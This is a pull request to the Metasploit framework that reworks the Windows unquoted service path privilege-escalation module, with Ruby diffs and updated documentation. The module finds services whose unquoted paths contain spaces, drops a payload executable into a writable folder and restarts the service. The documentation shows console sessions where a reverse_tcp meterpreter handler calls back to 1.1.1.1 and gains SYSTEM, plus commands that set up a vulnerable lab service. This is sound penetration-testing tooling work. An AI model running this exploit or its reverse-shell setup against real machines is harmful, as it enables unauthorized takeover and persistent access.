### PR TITLE
Updates to Trusted Service Path (now Unquoted Service path)

### DIFF
--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -24,6 +24,9 @@ In Win7+ the deeper folders are more likely to succeed based on default Windows 
 Then, a service restart is required.  Often a user won't be able to do this,
 so the payload is left on disk as a reboot or service restart will trigger the payload to launch.
 
+The service will fail to start as long as the payload remains on disk.  Manual cleanup of the payload
+is required.
+
 ### Creating a Vulnerable Service
 
 This is sourced from @sumitvgithub's write-up
@@ -50,24 +53,34 @@ This creates a vulnerable service, with `A Subfolder` being vulnerable to user w
 
 ## Options
 
+### QUICK
+
+If only the first service should attempt to be exploited, or all of them (sequentially).  Default is `true`
+
 ## Scenarios
 
 ### Windows 10 (16299) with Service Listed Above
 
-User Shell:
 
 ```
-msf5 > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 8888
-[*] Payload handler running as background job 0.
-msf5 > 
-[*] Started reverse TCP handler on 1.1.1.1:8888 
+[*] Using exploit/windows/local/unquoted_service_path
+resource (unquoted.rb)> setg verbose true
+verbose => true
+resource (unquoted.rb)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (unquoted.rb)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unquoted.rb)> setg lport 4444
+lport => 4444
+resource (unquoted.rb)> set session 1
+session => 1
+msf5 exploit(windows/local/unquoted_service_path) > 
 [*] Sending stage (180291 bytes) to 2.2.2.2
-[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49744) at 2020-04-03 21:32:36 -0400
-sessions -i 1
+[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49696) at 2020-04-10 14:41:32 -0400
+
+msf5 exploit(windows/local/unquoted_service_path) > sessions -i 1
 [*] Starting interaction with 1...
 
-meterpreter > getuid
-Server username: MSEDGEWIN10\IEUser
 meterpreter > sysinfo
 Computer        : MSEDGEWIN10
 OS              : Windows 10 (10.0 Build 16299).
@@ -76,28 +89,10 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: MSEDGEWIN10\IEUser
 meterpreter > background
 [*] Backgrounding session 1...
-```
-
-Unquoted Service Path Exploit:
-
-```
-msf5 > use unquoted_service_path
-
-Matching Modules
-================
-
-   #  Name                                         Disclosure Date  Rank       Check  Description
-   -  ----                                         ---------------  ----       -----  -----------
-   0  exploit/windows/local/unquoted_service_path  2001-10-25       excellent  Yes    Windows Unquoted Service Path Privilege Escalation
-
-
-[*] Using exploit/windows/local/unquoted_service_path
-msf5 exploit(windows/local/unquoted_service_path) > set session 1
-session => 1
-msf5 exploit(windows/local/unquoted_service_path) > set verbose true
-verbose => true
 msf5 exploit(windows/local/unquoted_service_path) > run
 
 [*] Started reverse TCP handler on 1.1.1.1:4444 
@@ -115,33 +110,52 @@ msf5 exploit(windows/local/unquoted_service_path) > run
 [-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
 [-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
-[*] Found vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
-[*] Placing C:\Program Files\A Subfolder\B Subfolder\C.exe for Some Vulnerable Service
-[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B Subfolder\C.exe...
-[-] Unable to write: core_channel_open: Operation failed: Access is denied.
+[+] Found vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
+[*] Attempting exploitation of Some Vulnerable Service
+[*] Enumerating vulnerable paths
+[*] Checking writability to: C:\Program Files\A Subfolder\B Subfolder
+[-] Path not writable
+[*] Checking writability to: C:\Program Files\A Subfolder
+[+] Path is writable
 [*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
 [*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
 [+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
 [+] Successfully wrote payload
 [*] Launching service Some Vulnerable Service...
+[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
 [-] [Some Vulnerable Service] Unhandled error: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
 [-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
 [*] Exploit completed, but no session was created.
 ```
 
-We weren't able to restart the service.  So we'll kick a `multi/handler` and wait for a reboot.
+Manually start a handler, and restart the service (via GUI) to launch the exploit
 
 ```
 msf5 exploit(windows/local/unquoted_service_path) > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 4444
 [*] Payload handler running as background job 1.
-msf5 exploit(windows/local/unquoted_service_path) > 
+
 [*] Started reverse TCP handler on 1.1.1.1:4444 
-[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
-[*] Sending stage (180291 bytes) to 2.2.2.2
-[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49706) at 2020-04-03 21:36:54 -0400
-sessions -i 2
+msf5 exploit(windows/local/unquoted_service_path) > [*] Sending stage (180291 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49708) at 2020-04-10 14:43:26 -0400
+
+msf5 exploit(windows/local/unquoted_service_path) > sessions -i 2
 [*] Starting interaction with 2...
 
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 16299).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
+```
+
+The most important part!!!
+
+```
+meterpreter > rm "C:\\Program Files\\A Subfolder\\B.exe"
+
 ```

--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -1,9 +1,12 @@
 ## Vulnerable Application
 
-Commonly known as Trusted Service Path, or Unquoted Service path, this exploits a behavior of windows service.  When a service calls an executable, a full path is given.  If the full path contains a space,
-Windows will attempt to execute a file up to the space, with `.exe` appended.  If the executable isn't found, it keeps going until the full path or the next space (and repeat).
+Commonly known as Trusted Service Path, or Unquoted Service path, this exploits a behavior of windows service.
+When a service calls an executable, a full path is given.  If the full path contains a space,
+Windows will attempt to execute a file up to the space, with `.exe` appended.
+If the executable isn't found, it keeps going until the full path or the next space (and repeat).
 
-@sumitvgithub had an excellent write-up on this [here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+@sumitvgithub had an excellent write-up on this
+[here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
 
 As is documented in that write-up, if the executable is C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
 
@@ -15,15 +18,16 @@ Windows will attempt to run the following, in order.
   4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
   5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
 
-To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.  In Win7+ the deeper folders are
-more likely to succeed based on default Windows permissions for users.
+To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.
+In Win7+ the deeper folders are more likely to succeed based on default Windows permissions for users.
 
-Then, a service restart is required.  Often a user won't be able to do this, so the payload is left on disk as a reboot or service restart will
-trigger the payload to launch.
+Then, a service restart is required.  Often a user won't be able to do this,
+so the payload is left on disk as a reboot or service restart will trigger the payload to launch.
 
 ### Creating a Vulnerable Service
 
-This is sourced from @sumitvgithub's write-up [here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+This is sourced from @sumitvgithub's write-up
+[here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
 
 With an administrator command prompt, execute the following:
 
@@ -43,7 +47,7 @@ This creates a vulnerable service, with `A Subfolder` being vulnerable to user w
   4. Do: ```set session #```
   5. Do: ```run```
   6. You should either get a shell, or need to start a `multi/handler` and have the target restarted.
- 
+
 ## Options
 
 ## Scenarios

--- a/documentation/modules/exploit/windows/local/unquoted_service_path.md
+++ b/documentation/modules/exploit/windows/local/unquoted_service_path.md
@@ -1,0 +1,143 @@
+## Vulnerable Application
+
+Commonly known as Trusted Service Path, or Unquoted Service path, this exploits a behavior of windows service.  When a service calls an executable, a full path is given.  If the full path contains a space,
+Windows will attempt to execute a file up to the space, with `.exe` appended.  If the executable isn't found, it keeps going until the full path or the next space (and repeat).
+
+@sumitvgithub had an excellent write-up on this [here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+
+As is documented in that write-up, if the executable is C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+
+Windows will attempt to run the following, in order.
+
+  1.  C:\Program.exe
+  2.  C:\Program Files\A.exe
+  3.  C:\Program Files\A Subfolder\B.exe
+  4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
+  5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+
+To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.  In Win7+ the deeper folders are
+more likely to succeed based on default Windows permissions for users.
+
+Then, a service restart is required.  Often a user won't be able to do this, so the payload is left on disk as a reboot or service restart will
+trigger the payload to launch.
+
+### Creating a Vulnerable Service
+
+This is sourced from @sumitvgithub's write-up [here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+
+With an administrator command prompt, execute the following:
+
+```
+sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
+mkdir "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"
+icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
+```
+
+This creates a vulnerable service, with `A Subfolder` being vulnerable to user writes.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a user shell
+  3. Do: ```use exploits/windows/local/unquoted_service_path```
+  4. Do: ```set session #```
+  5. Do: ```run```
+  6. You should either get a shell, or need to start a `multi/handler` and have the target restarted.
+ 
+## Options
+
+## Scenarios
+
+### Windows 10 (16299) with Service Listed Above
+
+User Shell:
+
+```
+msf5 > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 8888
+[*] Payload handler running as background job 0.
+msf5 > 
+[*] Started reverse TCP handler on 1.1.1.1:8888 
+[*] Sending stage (180291 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49744) at 2020-04-03 21:32:36 -0400
+sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: MSEDGEWIN10\IEUser
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 16299).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Unquoted Service Path Exploit:
+
+```
+msf5 > use unquoted_service_path
+
+Matching Modules
+================
+
+   #  Name                                         Disclosure Date  Rank       Check  Description
+   -  ----                                         ---------------  ----       -----  -----------
+   0  exploit/windows/local/unquoted_service_path  2001-10-25       excellent  Yes    Windows Unquoted Service Path Privilege Escalation
+
+
+[*] Using exploit/windows/local/unquoted_service_path
+msf5 exploit(windows/local/unquoted_service_path) > set session 1
+session => 1
+msf5 exploit(windows/local/unquoted_service_path) > set verbose true
+verbose => true
+msf5 exploit(windows/local/unquoted_service_path) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Finding a vulnerable service...
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[*] Found vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
+[*] Placing C:\Program Files\A Subfolder\B Subfolder\C.exe for Some Vulnerable Service
+[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B Subfolder\C.exe...
+[-] Unable to write: core_channel_open: Operation failed: Access is denied.
+[*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
+[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
+[+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
+[+] Successfully wrote payload
+[*] Launching service Some Vulnerable Service...
+[-] [Some Vulnerable Service] Unhandled error: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
+[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
+[*] Exploit completed, but no session was created.
+```
+
+We weren't able to restart the service.  So we'll kick a `multi/handler` and wait for a reboot.
+
+```
+msf5 exploit(windows/local/unquoted_service_path) > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 4444
+[*] Payload handler running as background job 1.
+msf5 exploit(windows/local/unquoted_service_path) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+[*] Sending stage (180291 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49706) at 2020-04-03 21:36:54 -0400
+sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -174,21 +174,9 @@ module Msf::Post::File
   # @return [Boolean] true if +path+ exists and is writable
   #
   def writable?(path)
-    # for windows we write a file to ensure everything is in order
-    if session.platform == 'windows'
-      f="#{path}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.txt"
-      words = Rex::Text.rand_text_alphanumeric(9)
-      begin
-        # path needs to have double, not single quotes
-        c= %Q(cmd.exe /C echo '#{words}' >> "#{f}" && type "#{f}" && del "#{f}")
-        cmd_exec(c).to_s.include? words
-      rescue Rex::Post::Meterpreter::RequestError => e
-        puts e
-        false
-      end
-    else
-      cmd_exec("test -w '#{path}' && echo true").to_s.include? 'true'
-    end
+    raise "`writable?' method does not support Windows systems" if session.platform == 'windows'
+
+    cmd_exec("test -w '#{path}' && echo true").to_s.include? 'true'
   end
 
   #

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -174,9 +174,21 @@ module Msf::Post::File
   # @return [Boolean] true if +path+ exists and is writable
   #
   def writable?(path)
-    raise "`writable?' method does not support Windows systems" if session.platform == 'windows'
-
-    cmd_exec("test -w '#{path}' && echo true").to_s.include? 'true'
+    # for windows we write a file to ensure everything is in order
+    if session.platform == 'windows'
+      f="#{path}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.txt"
+      words = Rex::Text.rand_text_alphanumeric(9)
+      begin
+        # path needs to have double, not single quotes
+        c= %Q(cmd.exe /C echo '#{words}' >> "#{f}" && type "#{f}" && del "#{f}")
+        cmd_exec(c).to_s.include? words
+      rescue Rex::Post::Meterpreter::RequestError => e
+        puts e
+        false
+      end
+    else
+      cmd_exec("test -w '#{path}' && echo true").to_s.include? 'true'
+    end
   end
 
   #

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -35,6 +35,9 @@ class MetasploitModule < Msf::Exploit::Local
 
         This technique was previously called Trusted Service Path, but is more commonly
         known as Unquoted Service Path.
+
+        The service exploited won't start until the payload written to disk is removed.
+        Manual cleanup is required.
       },
       'References'     =>
         [
@@ -53,19 +56,60 @@ class MetasploitModule < Msf::Exploit::Local
       'Targets'        => [ ['Windows', {}] ],
       'SessionTypes'   => [ "meterpreter" ],
       'DefaultTarget'  => 0,
+      'Notes'          =>
+        {
+          'Stability'   => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+        }
     ))
+    register_options([
+      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', true])
+    ])
   end
 
-
   def check
-    if enum_vuln_services.empty?
-      return Exploit::CheckCode::Safe
-    else
-      # Found service is running system
-      return Exploit::CheckCode::Vulnerable
+    services = enum_vuln_services(datastore['QUICK'])
+    if services.empty?
+      return CheckCode::Safe
+    end
+    services.each do |svrs|
+      if generate_folders(svrs[1], datastore['QUICK']).empty?
+        # Found service is running system with writable path
+        return CheckCode::Vulnerable
+      end
     end
   end
 
+  ###
+  # this function uses a loop to go from the longest potential path (most likely with write access), to shortest.
+  # >> fpath = 'C:\\Program Files\\A Subfolder\\B Subfolder\\C Subfolder\\SomeExecutable.exe'
+  # >> fpath = fpath.split(' ')[0...-1]
+  # >> fpath.reverse.each { |x| puts fpath[0..fpath.index(x)].join(' ')}
+  # C:\Program Files\A Subfolder\B Subfolder\C
+  # C:\Program Files\A Subfolder\B
+  # C:\Program Files\A
+  # C:\Program
+  ###
+
+  def generate_folders(fpath, quick)
+    potential_paths = []
+    fpath.reverse.each do |x|
+      path = fpath[0..fpath.index(x)].join(' ')
+      path_no_file = path.split('\\')[0...-1].join('\\')
+      vprint_status("Checking writability to: #{path_no_file}")
+      # when we test writability, we drop off last part since thats the file name
+      unless writable?(path_no_file)
+        vprint_error("Path not writable")
+        next
+      end
+      vprint_good("Path is writable")
+      # include file name for the path
+      potential_paths << path
+      return potential_paths if quick
+    end
+    potential_paths
+  end
 
   def enum_vuln_services(quick=false)
     vuln_services = []
@@ -84,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
         next if cmd !~ /^[a-z]\:.+\.exe$/i
         next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)
 
-        vprint_status("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
+        vprint_good("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
         vuln_services << [service[:name], cmd]
 
         # This process can be pretty damn slow.
@@ -93,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    return vuln_services
+    vuln_services
   end
 
 
@@ -102,53 +146,39 @@ class MetasploitModule < Msf::Exploit::Local
     # Exploit the first service found
     #
     print_status("Finding a vulnerable service...")
-    svrs = enum_vuln_services(true)
+    svrs_list = enum_vuln_services(datastore['QUICK'])
 
-    fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs.empty?
+    fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs_list.empty?
 
-    svr_name = svrs.first[0]
-    fpath    = svrs.first[1]
-    fpath = fpath.split(' ')[0...-1] # cut off the .exe last portion
-    potential_paths = []
+    svrs_list.each do |svrs|
+      print_status("Attempting exploitation of #{svrs[0]}")
+      svr_name = svrs[0]
+      fpath    = svrs[1]
+      fpath = fpath.split(' ')[0...-1] # cut off the .exe last portion
+      vprint_status('Enumerating vulnerable paths')
+      potential_paths = generate_folders fpath, datastore['QUICK']
 
-    ###
-    # this loop is to go from the longest potential path (most likely with write access), to shortest.
-    # >> fpath = 'C:\\Program Files\\A Subfolder\\B Subfolder\\C Subfolder\\SomeExecutable.exe'
-    # >> fpath = fpath.split(' ')[0...-1]
-    # >> fpath.reverse.each { |x| puts fpath[0..fpath.index(x)].join(' ')}
-    # C:\Program Files\A Subfolder\B Subfolder\C
-    # C:\Program Files\A Subfolder\B
-    # C:\Program Files\A
-    # C:\Program
-    ###
-
-    fpath.reverse.each { |x| potential_paths << fpath[0..fpath.index(x)].join(' ')}
-
-    #
-    # Drop the malicious executable into the path
-    #
-    potential_paths.each do |path|
-      exe_path = "#{path}.exe"
-      print_status("Placing #{exe_path} for #{svr_name}")
-      exe = generate_payload_exe_service({:servicename=>svr_name})
-      print_status("Attempting to write #{exe.length.to_s} bytes to #{exe_path}...")
-      begin
+      #
+      # Drop the malicious executable into the path
+      #
+      potential_paths.each do |path|
+        exe_path = "#{path}.exe"
+        print_status("Placing #{exe_path} for #{svr_name}")
+        exe = generate_payload_exe_service({:servicename=>svr_name})
+        print_status("Attempting to write #{exe.length.to_s} bytes to #{exe_path}...")
         write_file(exe_path, exe)
         print_good("Manual cleanup of #{exe_path} is required due to a potential reboot for exploitation.")
-      rescue Rex::Post::Meterpreter::RequestError => e
-        # Can't write the file
-        print_error "Unable to write: #{e.message}"
-        next
+        print_good "Successfully wrote payload"
+        #
+        # Run the service, let the Windows API do the rest
+        #
+        print_status("Launching service #{svr_name}...")
+        print_status("Manual cleanup of the payload file is required. #{svr_name} will fail to start as long as the payload remains on disk.")
+        unless service_restart(svr_name)
+          print_error 'Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!'
+        end
+        break
       end
-      print_good "Successfully wrote payload"
-      #
-      # Run the service, let the Windows API do the rest
-      #
-      print_status("Launching service #{svr_name}...")
-      unless service_restart(svr_name)
-        print_error 'Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!'
-      end
-      break
     end
   end
 end

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Exploit::Local
       'References'     =>
         [
           ['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx'],
-          ['URL', 'http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us']  #pg 676
+          ['URL', 'http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us'],  #pg 676
+          ['URL', 'https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae']
         ],
       'DisclosureDate' => "Oct 25 2001",
       'License'        => MSF_LICENSE,

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -12,10 +12,12 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Post::Windows::Services
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/local/trusted_service_path'
 
   def initialize(info={})
     super( update_info( info,
-      'Name'           => 'Windows Service Trusted Path Privilege Escalation',
+      'Name'           => 'Windows Unquoted Service Path Privilege Escalation',
       'Description'    => %q{
         This module exploits a logic flaw due to how the lpApplicationName parameter
         is handled.  When the lpApplicationName contains a space, the file name is
@@ -30,6 +32,9 @@ class MetasploitModule < Msf::Exploit::Local
 
         The offensive technique is also described in Writing Secure Code (2nd Edition),
         Chapter 23, in the section "Calling Processes Security" on page 676.
+
+        This technique was previously called Trusted Service Path, but is more commonly
+        known as Unquoted Service Path.
       },
       'References'     =>
         [
@@ -40,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Local
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'sinn3r'
+          'sinn3r', #msf module
+          'h00die'  #improvements
         ],
       'Platform'       => [ 'win'],
       'Targets'        => [ ['Windows', {}] ],
@@ -101,26 +107,47 @@ class MetasploitModule < Msf::Exploit::Local
 
     svr_name = svrs.first[0]
     fpath    = svrs.first[1]
-    exe_path = "#{fpath.split(' ')[0]}.exe"
-    print_status("Placing #{exe_path} for #{svr_name}")
+    fpath = fpath.split(' ')[0...-1] # cut off the .exe last portion
+    potential_paths = []
+
+    ###
+    # this loop is to go from the longest potential path (most likely with write access), to shortest.
+    # >> fpath = 'C:\\Program Files\\A Subfolder\\B Subfolder\\C Subfolder\\SomeExecutable.exe'
+    # >> fpath = fpath.split(' ')[0...-1]
+    # >> fpath.reverse.each { |x| puts fpath[0..fpath.index(x)].join(' ')}
+    # C:\Program Files\A Subfolder\B Subfolder\C
+    # C:\Program Files\A Subfolder\B
+    # C:\Program Files\A
+    # C:\Program
+    ###
+
+    fpath.reverse.each { |x| potential_paths << fpath[0..fpath.index(x)].join(' ')}
 
     #
     # Drop the malicious executable into the path
     #
-    exe = generate_payload_exe_service({:servicename=>svr_name})
-    print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...")
-    begin
-      write_file(exe_path, exe)
-      register_files_for_cleanup(exe_path)
-    rescue Rex::Post::Meterpreter::RequestError => e
-      # Can't write the file, can't go on
-      fail_with(Failure::Unknown, e.message)
+    potential_paths.each do |path|
+      exe_path = "#{path}.exe"
+      print_status("Placing #{exe_path} for #{svr_name}")
+      exe = generate_payload_exe_service({:servicename=>svr_name})
+      print_status("Attempting to write #{exe.length.to_s} bytes to #{exe_path}...")
+      begin
+        write_file(exe_path, exe)
+        print_good("Manual cleanup of #{exe_path} is required due to a potential reboot for exploitation.")
+      rescue Rex::Post::Meterpreter::RequestError => e
+        # Can't write the file
+        print_error "Unable to write: #{e.message}"
+        next
+      end
+      print_good "Successfully wrote payload"
+      #
+      # Run the service, let the Windows API do the rest
+      #
+      print_status("Launching service #{svr_name}...")
+      unless service_restart(svr_name)
+        print_error 'Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!'
+      end
+      break
     end
-
-    #
-    # Run the service, let the Windows API do the rest
-    #
-    print_status("Launching service #{svr_name}...")
-    service_restart(svr_name)
   end
 end

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -74,11 +74,13 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
     services.each do |svrs|
-      if generate_folders(svrs[1], datastore['QUICK']).empty?
+      fpath = svrs[1].split(' ')[0...-1] # cut off the .exe last portion
+      unless generate_folders(fpath, datastore['QUICK']).empty?
         # Found service is running system with writable path
         return CheckCode::Vulnerable
       end
     end
+    CheckCode::Safe
   end
 
   ###
@@ -140,6 +142,18 @@ class MetasploitModule < Msf::Exploit::Local
     vuln_services
   end
 
+  # overwrite the writable? included in file.rb addon since it can't do windows.
+  def writable?(path)
+    f="#{path}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.txt"
+    words = Rex::Text.rand_text_alphanumeric(9)
+    begin
+      # path needs to have double, not single quotes
+      c= %Q(cmd.exe /C echo '#{words}' >> "#{f}" && type "#{f}" && del "#{f}")
+      cmd_exec(c).to_s.include? words
+    rescue Rex::Post::Meterpreter::RequestError => e
+      false
+    end
+  end
 
   def exploit
     #


### PR DESCRIPTION
Fixes #11319

@sinn3r a long while ago wrote this local exploit.  Seems to be quite popular on EDB (110+ vuln applications).  When it was originally written, most likely against XP, permissions on the filesystem were much more relaxed, and writing to `C:\` was easy.  Win7+ changed that, so the logic now is reversed where we try the longest path FIRST and work our way to the shortest, and keep trying w/o giving up.

Changes:
1. Try multiple paths instead of giving up after the first one
2. Attempt longest to shortest, instead of shortest to longest
3. leave payload on disk since many times we're unable to restart the service (but a system reboot or service restart will exploit the box)
4. Rename to the current naming methodology, which seems to be more popular
5. add docs